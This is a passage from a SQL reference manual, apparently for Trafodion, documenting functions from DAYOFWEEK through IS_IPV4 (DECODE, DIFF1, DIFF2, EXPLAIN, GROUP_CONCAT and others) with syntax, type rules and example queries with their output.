and\r\nso forth.\r\n\r\nDAYOFWEEK is a {project-name} SQL extension.\r\n\r\n```\r\nDAYOFWEEK (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.
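\r\n\r\nDAYOFWEEK always numbers the week from Sunday. Where a Monday-based\r\nnumbering (Monday = 1 through Sunday = 7) is needed instead, it can be\r\nderived with MOD; this is a sketch, not a built-in variant of the\r\nfunction:\r\n\r\n```\r\nMOD(DAYOFWEEK(datetime-expression) + 5, 7) + 1\r\n```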
\r\n\r\n[[examples_of_dayofweek]]\r\n=== Examples of DAYOFWEEK\r\n\r\n* Return an integer that represents the day of the week from the\r\nSTART_DATE column in the PROJECT table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYOFWEEK(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 5\r\n```\r\n+\r\nThe value returned is 5, representing Thursday. The week begins on Sunday.\r\n\r\n<<<\r\n[[dayofyear_function]]\r\n== DAYOFYEAR Function\r\n\r\nThe DAYOFYEAR function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 366 that represents the\r\ncorresponding day of the year.\r\n\r\nDAYOFYEAR is a {project-name} SQL extension.\r\n\r\n```\r\nDAYOFYEAR (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_dayofyear]]\r\n=== Examples of DAYOFYEAR\r\n\r\n* Return an integer that represents the day of the year from the\r\nstart date column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYOFYEAR(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- --------------------\r\n2008-04-10 2008-04-21 08:15:00.000000 101\r\n```\r\n\r\n<<<\r\n[[decode_function]]\r\n== DECODE Function\r\n\r\nThe DECODE function compares _expr_ to each _test-expr_ value one by one\r\nin the order provided. If _expr_ is equal to a _test-expr_, then the\r\ncorresponding _retval_ is returned. If no match is found, _default_ is\r\nreturned. If no match is found and _default_ is omitted, NULL is\r\nreturned.\r\n\r\nDECODE is a {project-name} SQL extension.\r\n\r\n```\r\nDECODE (expr, test-expr, retval [, test-expr2, retval2 ... ] [ , default ] )\r\n```\r\n\r\n* `_expr_`\r\n+\r\nis an SQL expression.\r\n\r\n* `_test-expr_, _test-expr2_, …`\r\n+\r\nare each an SQL expression of a type comparable to that of _expr_.\r\n\r\n* `_retval_`\r\n+\r\nis an SQL expression.\r\n\r\n* `_retval2_, …, _default_`\r\n+\r\nare each an SQL expression of a type comparable to that of _retval_.\r\n\r\n[[considerations_for_decode]]\r\n=== Considerations for DECODE\r\n\r\nIn a DECODE function, two nulls are considered to be equivalent. If\r\n_expr_ is null, then the returned value is the _retval_ of the first\r\n_test-expr_ that is also null.\r\n\r\nThe _expr_, _test-expr_, _retval_, and _default_ values can be\r\nderived from expressions.\r\n\r\nThe arguments can be any of the numeric types or character types.\r\nHowever, _expr_ and each _test-expr_ value must be of comparable types.\r\nIf _expr_ and _test-expr_ values are character types, they must be in\r\nthe same character set (to be comparable types).\r\n\r\nAll the _retval_ values and the _default_ value, if any, must be of\r\ncomparable types.\r\n\r\nIf _expr_ and a _test-expr_ value are character data, the comparison is\r\nmade using non-padded comparison semantics.\r\n\r\nIf _expr_ and a _test-expr_ value are numeric data, the comparison is\r\nmade with a temporary copy of one of the numbers, according to defined\r\nrules of conversion. For example, if one number is INTEGER and the other\r\nis DECIMAL, the comparison is made with a temporary copy of the integer\r\nconverted to a decimal.
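\r\n\r\nAs a minimal sketch of that conversion rule (the table t and its INTEGER\r\ncolumn i are hypothetical), each value of i is compared against the\r\nDECIMAL test values through such a converted copy:\r\n\r\n```\r\nSELECT DECODE(i, 1.0, 'low', 2.5, 'medium', 'high')\r\nFROM t;\r\n```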
\r\n\r\nIf all the possible return values are of fixed-length character types,\r\nthe returned value is a fixed-length character string with size equal to\r\nthe maximum size of all the possible return value types.\r\n\r\nIf any of the possible return values is a variable-length character\r\ntype, the returned value is a variable-length character string with\r\nmaximum size equal to the maximum size of all the possible return value\r\ntypes.\r\n\r\nIf all the possible return values are of integer types, the returned\r\nvalue is the same type as the largest integer type of all the possible\r\nreturn values.\r\n\r\nIf the returned value is of type FLOAT, the precision is the maximum\r\nprecision of all the possible return values.\r\n\r\nIf all the possible returned values are of the same non-integer, numeric\r\ntype (REAL, FLOAT, DOUBLE PRECISION, NUMERIC, or DECIMAL), the returned\r\nvalue is of that same type.\r\n\r\nIf all the possible return values are of numeric types but not all the\r\nsame, and at least one is REAL, FLOAT, or DOUBLE PRECISION, then the\r\nreturned value is of type DOUBLE PRECISION.\r\n\r\nIf all the possible return values are of numeric types but not all the\r\nsame, none are REAL, FLOAT, or DOUBLE PRECISION, and at least one is of\r\ntype NUMERIC, then the returned value is of type NUMERIC.\r\n\r\nIf all the possible return values are of numeric types, none are\r\nNUMERIC, REAL, FLOAT, or DOUBLE PRECISION, and at least one is of type\r\nDECIMAL, then the returned value is of type DECIMAL.\r\n\r\nIf the returned value is of type NUMERIC or DECIMAL, it has a precision\r\nequal to the sum of:\r\n\r\n* The maximum scale of all the possible return value types and\r\n* The maximum value of (precision - scale) for all the possible return value types.\r\n\r\nHowever, the precision will not exceed 18.\r\n\r\nThe scale of the returned value is the minimum of:\r\n\r\n* The maximum scale of all the possible return value types and\r\n* 18 - (the maximum value of (precision - scale) for all the possible\r\nreturn value types).\r\n\r\nThe number of components in the DECODE function, including _expr_,\r\n_test-exprs_, _retvals_, and _default_, has no limit other than\r\nthe general limit of how big an SQL expression can be. However, large\r\nlists do not perform well.\r\n\r\nThe syntax\r\n\r\n```\r\nDECODE (expr, test-expr, retval [, test-expr2, retval2 ... 
] [, default ] )\r\n```\r\n\r\nis logically equivalent to the following:\r\n\r\n```\r\nCASE\r\n WHEN (expr IS NULL AND test-expr IS NULL) OR expr = test-expr THEN retval\r\n WHEN (expr IS NULL AND test-expr2 IS NULL) OR expr = test-expr2 THEN retval2\r\n ...\r\n ELSE default \/* or ELSE NULL if default is not specified *\/\r\nEND\r\n```\r\n\r\nNo special conversion of _expr_, _test-exprN_, or _retvalN_ exists\r\nother than what a CASE statement normally does.\r\n\r\n[[examples_of_decode]]\r\n<<<\r\n=== Examples of DECODE\r\n\r\n* Example of the DECODE function:\r\n+\r\n```\r\nSELECT\r\n emp_name\r\n, DECODE( CAST (( yrs_of_service + 3) \/ 4 AS INT )\r\n , 0,0.04\r\n , 1,0.04\r\n , 0.06\r\n ) as perc_value\r\nFROM employees;\r\n\r\nSELECT\r\n supplier_name\r\n, DECODE( supplier_id\r\n , 10000\r\n , 'Company A'\r\n , 10001\r\n , 'Company B'\r\n , 10002\r\n , 'Company C'\r\n , 'Company D'\r\n ) as result\r\nFROM suppliers;\r\n```\r\n\r\n* This example shows a different way of handling NULL specified as\r\ndefault and not specified as default explicitly:\r\n+\r\n```\r\nSELECT DECODE( (?p1 || ?p2), trim(?p1), 'Hi', ?p3, null ) from emp;\r\n..\r\n*** ERROR[4049] A CASE expression cannot have a result data type of both CHAR(2) and NUMERIC(18,6).\r\n*** ERROR[4062] The preceding error actually occurred in function DECODE((?P1 || ?P2),(' ' TRIM ?P1), 'Hi', ?P3, NULL)\r\n*** ERROR[8822] The statement was not prepared.\r\n```\r\n+\r\nThe last _retval_ is an explicit NULL. When {project-name} SQL encounters\r\nthis situation, it assumes that the return value will be NUMERIC(18,6).\r\nOnce {project-name} SQL determines that the return values are numeric, it\r\ndetermines that all possible return values must be numeric. When 'Hi' is\r\nencountered in a _retval_ position, the error is produced because the\r\nCHAR(2) type argument is not comparable with a NUMERIC(18,6) type return\r\nvalue.\r\n+\r\nThis statement is equivalent and will not produce an error:\r\n+\r\n```\r\nSELECT DECODE( (?p1 || ?p2), trim(?p1), 'Hi' ) from emp;\r\n```\r\n\r\n<<<\r\n[[degrees_function]]\r\n== DEGREES Function\r\n\r\nThe DEGREES function converts a numeric value expression expressed in\r\nradians to the number of degrees.\r\n\r\nDEGREES is a {project-name} SQL extension.\r\n\r\n```\r\nDEGREES (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the DEGREES function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_degrees]]\r\n=== Examples of DEGREES\r\n\r\n* This function returns the value 45.0001059971939008 in degrees:\r\n+\r\n```\r\nDEGREES(0.78540)\r\n```\r\n\r\n* This function returns the value of 45. The function DEGREES is the\r\ninverse of the function RADIANS.\r\n+\r\n```\r\nDEGREES(RADIANS(45))\r\n```\r\n\r\n<<<\r\n[[diff1_function]]\r\n== DIFF1 Function\r\n\r\nThe DIFF1 function is a sequence function that calculates the amount of\r\nchange in an expression from row to row in an intermediate result table\r\nordered by a SEQUENCE BY clause in a SELECT statement.\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nDIFF1 is a {project-name} SQL extension.\r\n\r\n```\r\nDIFF1 (column-expression-a [,column-expression-b])\r\n```\r\n\r\n* `_column-expression-a_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. 
If you specify only one column as an argument, DIFF1 returns\r\nthe difference between the value of the column in the current row and\r\nits value in the previous row; this version calculates the unit change\r\nin the value from row to row.\r\n\r\n* `_column-expression-b_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify two columns as arguments, DIFF1 returns the\r\ndifference in consecutive values in _column-expression-a_ divided by\r\nthe difference in consecutive values in _column-expression-b_.\r\n\r\nThe purpose of the second argument is to distribute the amount of change\r\nfrom row to row evenly over some unit of change (usually time) in\r\nanother column.\r\n\r\n[[considerations_for_diff1]]\r\n=== Considerations for DIFF1\r\n\r\n[[equivalent-result]]\r\n==== Equivalent Result\r\n\r\nIf you specify one argument, the result of DIFF1 is equivalent to\r\n`column-expression-a - OFFSET(column-expression-a, 1)`. If you specify two\r\narguments, the result of DIFF1 is equivalent to:\r\n\r\n```\r\nDIFF1(column-expression-a) \/ DIFF1(column-expression-b)\r\n```\r\n\r\nThe two-argument version involves division by the result of the DIFF1\r\nfunction. To avoid divide-by-zero errors, be sure that\r\n_column-expression-b_ does not contain any duplicate values whose DIFF1\r\ncomputation could result in a divisor of zero.\r\n\r\n[[datetime-arguments]]\r\n==== Datetime Arguments\r\n\r\nIn general, {project-name} SQL does not allow division by a value of INTERVAL\r\ndata type. However, to permit use of the two-argument version of DIFF1\r\nwith times and dates, {project-name} SQL relaxes this restriction and allows\r\ndivision by a value of INTERVAL data type.\r\n\r\n[[examples_of_diff1]]\r\n=== Examples of DIFF1\r\n\r\n* Retrieve the difference between the I1 column in the current row and\r\nthe I1 column in the previous row:\r\n+\r\n```\r\nSELECT DIFF1 (I1) AS DIFF1_I1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_I1\r\n------------\r\n ?\r\n 21959\r\n -9116\r\n -14461\r\n 7369\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe first row retrieved displays null because the offset from the\r\ncurrent row does not fall within the results set.\r\n\r\n* Retrieve the difference between the TS column in the current row and\r\nthe TS column in the previous row:\r\n+\r\n```\r\nSELECT DIFF1 (TS) AS DIFF1_TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_TS\r\n--------------------\r\n ?\r\n 30002620.000000\r\n 134157861.000000\r\n 168588029.000000\r\n 114055223.000000\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are expressed as the number of seconds. For example, the\r\ndifference between TIMESTAMP '1951-02-15 14:35:49' and TIMESTAMP\r\n'1950-03-05 08:32:09' is approximately 347 days. The difference between\r\nTIMESTAMP '1955-05-18 08:40:10' and TIMESTAMP '1951-02-15 14:35:49' is\r\napproximately 4 years and 3 months, and so on.\r\n\r\n<<<\r\n* This query retrieves the difference in consecutive values in I1\r\ndivided by the difference in consecutive values in TS:\r\n+\r\n```\r\nSELECT DIFF1 (I1,TS) AS DIFF1_I1TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_I1TS\r\n-------------------\r\n ?\r\n .0007319\r\n -.0000679\r\n -.0000857\r\n .0000646\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are equivalent to the quotient of the results from the two\r\npreceding examples. For example, in the second row of the output of this\r\nexample, 0.0007319 is equal to 21959 divided by 30002620.
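\r\n\r\nBecause the two-argument form is equivalent to dividing the two\r\nsingle-argument results, the preceding query can also be written as the\r\nfollowing sketch against the same table:\r\n\r\n```\r\nSELECT DIFF1 (I1) \/ DIFF1 (TS) AS DIFF1_I1TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n```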
\r\n\r\n<<<\r\n[[diff2_function]]\r\n== DIFF2 Function\r\n\r\nThe DIFF2 function is a sequence function that calculates the amount of\r\nchange in a DIFF1 value from row to row in an intermediate result table\r\nordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nDIFF2 is a {project-name} SQL extension.\r\n\r\n```\r\nDIFF2 (column-expression-a [,column-expression-b])\r\n```\r\n\r\n* `_column-expression-a_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify only one column as an argument, DIFF2 returns\r\nthe difference between the value of DIFF1(_column-expression-a_) in\r\nthe current row and the same result in the previous row.\r\n\r\n* `_column-expression-b_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify two columns as arguments, DIFF2 returns the\r\ndifference in consecutive values of DIFF1(_column-expression-a_)\r\ndivided by the difference in consecutive values in\r\n_column-expression-b_.\r\nSee <<diff1_function,DIFF1 Function>>.\r\n\r\n[[considerations_for_diff2]]\r\n=== Considerations for DIFF2\r\n\r\n[[equivalent_result_1]]\r\n==== Equivalent Result\r\n\r\n* If you specify one argument, the result of DIFF2 is equivalent to:\r\n+\r\n```\r\nDIFF1(column-expression-a) - OFFSET(DIFF1(column-expression-a),1)\r\n```\r\n\r\n* If you specify two arguments, the result of DIFF2 is equivalent to:\r\n+\r\n```\r\nDIFF2(column-expression-a) \/ DIFF1(column-expression-b)\r\n```\r\n\r\nThe two-argument version involves division by the result of the DIFF1\r\nfunction. To avoid divide-by-zero errors, be sure that\r\n_column-expression-b_ does not contain any duplicate values whose DIFF1\r\ncomputation could result in a divisor of zero.\r\n\r\n\r\n[[datetime_arguments]]\r\n==== Datetime Arguments\r\n\r\nIn general, {project-name} SQL does not allow division by a value of INTERVAL\r\ndata type. However, to permit use of the two-argument version of DIFF2\r\nwith times and dates, {project-name} SQL relaxes this restriction and allows\r\ndivision by a value of INTERVAL data type.\r\n\r\n[[examples_of_diff2]]\r\n=== Examples of DIFF2\r\n\r\n* Retrieve the difference between the value of DIFF1(I1) in the current\r\nrow and the same result in the previous row:\r\n+\r\n```\r\nSELECT DIFF2 (I1) AS DIFF2_I1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF2_I1\r\n--------------------\r\n ?\r\n ?\r\n -31075\r\n -5345\r\n 21830\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are equal to the difference of DIFF1(I1) for the current row\r\nand DIFF1(I1) of the previous row. For example, in the third row of the\r\noutput of this example, -31075 is equal to\r\n-9116 minus 21959. 
The value -9116 is the result of DIFF1(I1) for the\r\ncurrent row, and the\r\nvalue 21959 is the result of DIFF1(I1) for the previous row.\r\nSee <<examples_of_diff1,Examples of DIFF1>>.\r\n\r\n* Retrieve the difference in consecutive values of DIFF1(I1) divided by\r\nthe difference in consecutive values of TS:\r\n+\r\n```\r\nSELECT DIFF2 (I1,TS) AS DIFF2_I1TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF2_I1TS\r\n---------------------\r\n ?\r\n ?\r\n -.000231\r\n -.000031\r\n .000191\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[exp_function]]\r\n== EXP Function\r\n\r\nThis function returns the exponential value (to the base e) of a numeric\r\nvalue expression. EXP is a {project-name} SQL extension.\r\n\r\n```\r\nEXP (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the EXP function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\nThe smallest valid input value lies between -744.4400720 and\r\n-744.4400719.\r\n\r\nThe largest valid input value lies between 709.78271289338404 and\r\n709.78271289338405.\r\n\r\n[[examples_of_exp]]\r\n=== Examples of EXP\r\n\r\n* This function returns the value 3.49034295746184128E+000, or\r\napproximately 3.4903:\r\n+\r\n```\r\nEXP (1.25)\r\n```\r\n\r\n* This function returns the value 2.0. The function EXP is the inverse\r\nof the function LOG:\r\n+\r\n```\r\nEXP (LOG(2.0))\r\n```\r\n\r\n<<<\r\n[[explain_function]]\r\n== EXPLAIN Function\r\n\r\nThe EXPLAIN function is a table-valued stored function that generates a\r\nresult table describing an access plan for a SELECT, INSERT, DELETE, or\r\nUPDATE statement.\r\nSee <<result_of_the_explain_function,Result of the EXPLAIN Function>>.\r\n\r\nThe EXPLAIN function can be specified as a table reference (_table_)\r\nin the FROM clause of a SELECT statement if it is preceded by the\r\nkeyword TABLE and surrounded by parentheses.\r\n\r\nFor information on the EXPLAIN statement,\r\nsee <<explain_statement,EXPLAIN Statement>>.\r\n\r\n```\r\nEXPLAIN (module,'statement-pattern')\r\n```\r\n\r\n* `_module_` is:\r\n+\r\n```\r\n'module-name' | NULL\r\n```\r\n\r\n* `'_module-name_'`\r\n+\r\nReserved for future use.\r\n+\r\nThe module name is enclosed in single quotes and is case-sensitive. If a\r\nmodule name is uppercase, the value you specify within single quotes\r\nmust be uppercase. For example: 'MYCAT.MYSCH.MYPROG'\r\n\r\n* `NULL`\r\n+\r\nexplains statements prepared in the session.\r\n\r\n* `'_statement-pattern_'`\r\n+\r\nA statement pattern is enclosed in single quotes and is case-sensitive.\r\nThe statement name must be in uppercase, unless you delimit the statement\r\nname in a PREPARE statement.\r\n\r\n[[considerations_for_explain_function]]\r\n=== Considerations for EXPLAIN Function\r\n\r\n\r\n[[using_a_statement_pattern]]\r\n==== Using a Statement Pattern\r\n\r\nUsing a statement pattern is analogous to using a LIKE pattern. 
You can\r\nuse the LIKE pattern in the following ways:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN(NULL,'S%'));\r\nSELECT * FROM table (EXPLAIN(NULL,'S1'));\r\nSELECT * FROM table (EXPLAIN(NULL,'%1'));\r\n```\r\n\r\nHowever, you cannot use the LIKE pattern in this way:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN (NULL, '%'));\r\n```\r\n\r\nThis statement returns the EXPLAIN result for all prepared statements\r\nwhose names begin with the uppercase letter 'S':\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN (NULL,'S%'));\r\n```\r\n\r\nIf the statement pattern does not find any matching statement names, no\r\nrows are returned as the result of the SELECT statement.\r\n\r\n\r\n[[obtaining_an_explain_plan_while_queries_are_running]]\r\n==== Obtaining an EXPLAIN Plan While Queries Are Running\r\n\r\n{project-name} SQL provides the ability to capture an EXPLAIN plan for a\r\nquery at any time while the query is running with the QID option. By\r\ndefault, this behavior is disabled for a {project-name} session.\r\n\r\nNOTE: Enable this feature before you start preparing and executing\r\nqueries.\r\n\r\nAfter this feature is enabled, use the following syntax in an EXPLAIN\r\nfunction to get the query execution plan of a running query:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN(NULL, 'QID=qid'))\r\n```\r\n\r\n* `_qid_` is a case-sensitive identifier, which represents the query ID. For\r\nexample:\r\n+\r\n```\r\n'QID=MXID01001011194212103659400053369000000085905admin00_2605_S1'\r\n```\r\n\r\nThe EXPLAIN function or statement returns the plan that was generated\r\nwhen the query was prepared. EXPLAIN for QID retrieves all the\r\ninformation from the original plan of the executing query. The plan is\r\navailable until the query finishes executing and is removed or\r\ndeallocated.\r\n\r\n<<<\r\n[[result_of_the_explain_function]]\r\n==== Result of the EXPLAIN Function\r\n\r\nThe result table of the EXPLAIN function describes the access plans for\r\nSELECT, INSERT, DELETE, or UPDATE statements.\r\n\r\nIn this description of the result of the EXPLAIN function, an operator\r\ntree is a structure that represents operators used in an access plan as\r\nnodes, with at most one parent node for each node in the tree, and with\r\nonly one root node.\r\n\r\nA node of an operator tree is a point in the tree that represents an\r\nevent (involving an operator) in a plan. Each node might have\r\nsubordinate nodes; that is, each event might generate a subordinate event\r\nor events in the plan.\r\n\r\n[cols=\"30%l,30%l,40%\",options=\"header\"]\r\n|===\r\n| Column Name | Data Type | Description\r\n| MODULE_NAME | CHAR(60) | Reserved for future use.\r\n| STATEMENT_NAME | CHAR(60) | Statement name; truncated on the right if longer than 60 characters.\r\n| PLAN_ID | LARGEINT | Unique system-generated plan ID automatically assigned by {project-name} SQL;\r\ngenerated at compile time.\r\n| SEQ_NUM | INT | Sequence number of the current operator in the operator tree; indicates\r\nthe sequence in which the operator tree is generated.\r\n| OPERATOR | CHAR(30) | Current operator type.\r\n| LEFT_CHILD_SEQ_NUM | INT | Sequence number for the first child operator of the current operator;\r\nnull if node has no child operators.\r\n| RIGHT_CHILD_SEQ_NUM | INT | Sequence number for the second child operator of the current operator;\r\nnull if node does not have a second child.\r\n| TNAME | CHAR(60) | For operators in scan group, full name of base table, truncated on the\r\nright if too long for column. 
If correlation name differs from table\r\nname, simple correlation name first and then table name in parentheses.\r\n| CARDINALITY | REAL | Estimated number of rows that will be returned by the current operator.\r\nCardinality appears as ROWS\/REQUEST in some forms of EXPLAIN output. For\r\nthe right child of a nested join, multiply the cardinality by the number\r\nof requests to get the total number of rows produced by this operator.\r\n| OPERATOR_COST | REAL | Estimated cost associated with the current operator to execute the\r\noperator.\r\n| TOTAL_COST | REAL | Estimated cost associated with the current operator to execute the\r\noperator, including the cost of all subtrees in the operator tree.\r\n| DETAIL_COST | VARCHAR (200) | Cost vector of five items, described in the next table.\r\n| DESCRIPTION | VARCHAR (3000) | Additional information about the operator.\r\n|===\r\n\r\nThe DETAIL_COST column of the EXPLAIN function results contains these\r\ncost factors:\r\n\r\n[cols=\"20%l,80%\"]\r\n|===\r\n| CPU_TIME | An estimate of the number of seconds of processor time it might take to\r\nexecute the instructions for this operator. A value of 1.0 is 1 second.\r\n| IO_TIME | An estimate of the number of seconds of I\/O time (seeks plus data\r\ntransfer) to perform the I\/O for this operator.\r\n| MSG_TIME | An estimate of the number of seconds it takes for the messaging for this\r\noperator. The estimate includes the time for the number of local and\r\nremote messages and the amount of data sent.\r\n| IDLETIME | An estimate of the number of seconds to wait for an event to happen. The\r\nestimate includes the amount of time to open a table or start an ESP\r\nprocess.\r\n| PROBES | The number of times the operator will be executed. Usually, this value\r\nis 1, but it can be greater when you have, for example, an inner scan of\r\na nested-loop join.\r\n|===\r\n\r\n[[examples_of_explain_function]]\r\n=== Examples of EXPLAIN Function\r\n\r\n* Display the specified columns in the result table of the EXPLAIN\r\nfunction for the prepared statement REG:\r\n+\r\n```\r\n>>SELECT seq_num, operator, operator_cost FROM table (EXPLAIN (null, 'REG'));\r\n\r\nSEQ_NUM OPERATOR OPERATOR_COST\r\n----------- ------------------------------ ---------------\r\n 1 TRAFODION_SCAN 0.43691027\r\n 2 ROOT 0.0\r\n\r\n--- 2 row(s) selected.\r\n```\r\n+\r\nThe example displays only part of the result table of the EXPLAIN\r\nfunction. It first uses the EXPLAIN function to generate the table and\r\nthen selects the desired columns.\r\n\r\n<<<\r\n[[extract_function]]\r\n== EXTRACT Function\r\n\r\nThe EXTRACT function extracts a datetime field from a datetime or\r\ninterval value expression. 
It returns an exact numeric value.\r\n\r\n```\r\nEXTRACT (datetime-field FROM extract-source)\r\n```\r\n\r\n* `_datetime-field_` is:\r\n+\r\nYEAR \\| MONTH \\| DAY \\| HOUR \\| MINUTE \\| SECOND\r\n\r\n* `_extract-source_` is:\r\n+\r\ndatetime-expression \\| interval-expression\r\n\r\nSee <<datetime_value_expressions,Datetime Value Expressions>> and\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n[[examples_of_extract]]\r\n=== Examples of EXTRACT\r\n\r\n* Extract the year from a DATE value:\r\n+\r\n```\r\nEXTRACT (YEAR FROM DATE '2007-09-28')\r\n```\r\n+\r\nThe result is 2007.\r\n\r\n* Extract the year from an INTERVAL value:\r\n+\r\n```\r\nEXTRACT (YEAR FROM INTERVAL '01-09' YEAR TO MONTH)\r\n```\r\n+\r\nThe result is 1.\r\n\r\n\r\n<<<\r\n[[hour_function]]\r\n== HOUR Function\r\n\r\nThe HOUR function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value in the range 0 through 23 that represents the\r\ncorresponding hour of the day.\r\n\r\nHOUR is a {project-name} SQL extension.\r\n\r\n```\r\nHOUR (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_hour]]\r\n=== Examples of HOUR\r\n\r\n* Return an integer that represents the hour of the day from the\r\nship timestamp column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, HOUR(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2007-04-10 2007-04-21 08:15:00.000000 8\r\n```\r\n\r\n<<<\r\n[[group_concat_function]]\r\n== GROUP_CONCAT Function\r\n\r\nThis function returns a string result with the concatenated non-NULL values from a group.\r\nIt returns NULL if there are no non-NULL values.\r\nThe syntax is as follows:\r\n\r\n```\r\nGROUP_CONCAT([DISTINCT] expr [,expr ...]\r\n [ORDER BY {unsigned_integer | col_name | expr}\r\n [ASC | DESC] [,col_name ...]]\r\n [SEPARATOR str_val])\r\n```\r\n\r\nThis function returns the concatenated values of the given expression\r\ncombination. To eliminate duplicate values, use the DISTINCT clause.\r\nTo sort values in the result, use the ORDER BY clause. To sort in reverse order, add\r\nthe DESC (descending) keyword to the name of the column you are sorting by in the\r\nORDER BY clause. The default is ascending order; this may be specified explicitly using\r\nthe ASC keyword. The default separator between values in a group is comma (,). To specify\r\na separator explicitly, use SEPARATOR followed by the string literal value that should be\r\ninserted between group values. To eliminate the separator altogether, specify SEPARATOR ''.\r\n\r\n[[examples_of_group_concat]]\r\n=== Examples of GROUP_CONCAT\r\n\r\nThe following example returns concatenated strings for column test_score for each student.\r\n\r\n```\r\n>> SELECT student_name,\r\n GROUP_CONCAT(DISTINCT test_score\r\n ORDER BY test_score DESC SEPARATOR ' ')\r\n FROM student\r\n GROUP BY student_name;\r\nSTUDENT_NAME (EXPR)\r\n-------------- --------------\r\nscott 91 90 80 56\r\ntom 91 77 43\r\n```\r\n\r\n<<<\r\n[[insert_function]]\r\n== INSERT Function\r\n\r\nThe INSERT function returns a character string where a specified number\r\nof characters within the character string have been deleted, beginning at\r\na specified start position, and where another character string has been\r\ninserted at the start position. 
Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nINSERT is a {project-name} SQL extension.\r\n\r\n```\r\nINSERT (char-expr-1, start, length, char-expr-2)\r\n```\r\n\r\n* `_char-expr-1_, _char-expr-2_`\r\n+\r\nare SQL character value expressions (of data type CHAR or VARCHAR) that\r\nspecify two strings of characters. The character string _char-expr-2_ is\r\ninserted into the character string _char-expr-1_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_start_`\r\n+\r\nspecifies the starting position _start_ within _char-expr-1_ at which to\r\nstart deleting _length_ number of characters. After the deletion, the\r\ncharacter string _char-expr-2_ is inserted into the character string\r\n_char-expr-1_, beginning at the start position specified by the number\r\n_start_. The number _start_ must be a value greater than zero of exact\r\nnumeric data type and with a scale of zero.\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to delete from _char-expr-1_. The\r\nnumber _length_ must be a value greater than or equal to zero of exact\r\nnumeric data type and with a scale of zero. _length_ must be less than\r\nor equal to the length of _char-expr-1_.\r\n\r\n[[examples_of_insert]]\r\n=== Examples of INSERT\r\n\r\n* Suppose that your JOB table includes an entry for a sales\r\nrepresentative. Use the INSERT function to change SALESREP to SALES REP:\r\n+\r\n```\r\nUPDATE persnl.job\r\nSET jobdesc = INSERT (jobdesc, 6, 3, ' REP')\r\nWHERE jobdesc = 'SALESREP';\r\n```\r\n+\r\nNow check the row you updated:\r\n+\r\n```\r\nSELECT jobdesc FROM persnl.job WHERE jobdesc = 'SALES REP';\r\n\r\nJob Description\r\n------------------\r\nSALES REP\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[is_ipv4_function]]\r\n== IS_IPV4 Function\r\n\r\nFor a given argument, IS_IPV4() returns 1 if it is a valid IPv4 string;\r\notherwise, it returns 0.\r\n\r\n```\r\nIS_IPV4( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\nvalidation of the IP address. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, IS_IPV4 returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_is_ipv4]]\r\n=== Examples of IS_IPV4\r\n\r\nThis function returns 1 for the first input argument, since it is a 